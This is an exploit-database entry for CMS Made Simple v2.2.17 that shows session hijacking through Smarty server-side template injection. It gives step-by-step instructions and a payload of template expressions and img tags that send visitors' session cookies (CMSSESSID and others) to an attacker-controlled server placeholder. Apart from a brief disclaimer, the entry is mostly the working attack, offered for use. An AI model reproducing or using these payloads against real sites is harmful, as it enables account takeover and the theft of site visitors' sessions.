Exploits / Vulnerability Discovered : 2023-07-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Cmsmadesimple v2.2.17 session hijacking via serverside template injection (ssti) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: SSTI
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 13-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
1. Login to test user account
2. Go to Content Manager
3. Add New Content
4. set as
'''
{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}
<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
<img src=YOU_SERVER/{$smarty.cookies.__c}>
'''
to conten_en section.
5.If any user visit to page, Hacker hijack all cookie